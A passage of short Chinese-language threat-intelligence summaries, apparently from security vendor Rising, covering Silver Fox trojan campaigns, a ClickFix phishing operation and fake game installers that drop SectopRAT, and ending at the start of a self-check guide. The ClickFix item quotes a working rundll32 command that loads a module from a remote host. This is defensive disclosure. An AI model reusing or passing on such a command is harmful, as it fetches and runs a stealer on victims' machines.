近期瑞星接到用户反馈的疑似银狐木马样本,经过分析确认,该样本是一个伪装成票务工具,是一个具备环境感知与按需投递能力的下载器,最终将下载易语言编写的模块化的银狐木马并执行。样本采用多阶段投递的方式,逐层按需落地恶意载荷。Payload执行后,并非立即窃取数据,而是优先完成对目标主机的深度环境画像,采集多种目标主机的内容,基于采集结果,恶意程序会动态评估目标价值,针对具备特定条件的机器,差异化下发特定恶意模块,实现按需精准操作的同时,大大的减少非任务代码暴露,增加分析难度。
瑞星威胁情报平台近期捕获到一起利用ClickFix战术实施的钓鱼攻击活动。攻击者通过伪造验证页面并仿冒合法机构主题内容,诱导受害者在本机执行恶意命令:rundll32.exe \\r2-gate-entry.terralibre.in.net@80\verification.google,#1,随后从远程加载恶意模块并投放Amatera Stealer窃密木马。
近日,瑞星威胁情报平台接到用户反馈,发现一起针对游戏玩家的攻击活动。攻击者制作假冒IndieGala平台成人游戏的恶意安装包,并通过网络渠道进行传播。该攻击链采用多层加载技术:先由Advanced Installer打包器释放MSI安装包,再通过PowerShell脚本添加Windows Defender排除项并下载加密载荷,最终部署SectopRAT远控木马。该木马具备较完整的窃密能力,可窃取40余款浏览器中的凭据与Cookie、加密货币钱包数据以及键盘记录,并可通过隐藏远程桌面(HVNC)实现对受害主机的进一步控制。攻击者还利用BSC区块链智能合约作为备用C2通道,体现出一定的反追踪与持久化能力。
“银狐”木马,是一类针对企事业单位管理人员、财务人员、销售人员及电商卖家进行钓鱼攻击的木马。攻击团伙频繁利用钓鱼邮件、虚假发票、伪造的政府通知等社会工程学手段,将远控木马悄然植入用户电脑,获得受害者的计算机控制权限,在系统内长期驻留,监控用户日常操作,窃取敏感信息,利用受害者的即时通信软件来发送具有针对性的钓鱼、欺诈类信息,实施钓鱼攻击和诈骗等违法行为。
市面上许多检测方法要么过于依赖技术(查看进程、分析代码),让普通用户望而却步;要么基于“可疑”特征,容易造成“草木皆兵”的恐慌。瑞星为广大用户制作了简易的自查手册,帮助用户快速排查自己的设备是否已经感染了“银狐”木马。只要按照以下步骤操作,若出现描述中的现象,即高度疑似感染“银狐”木马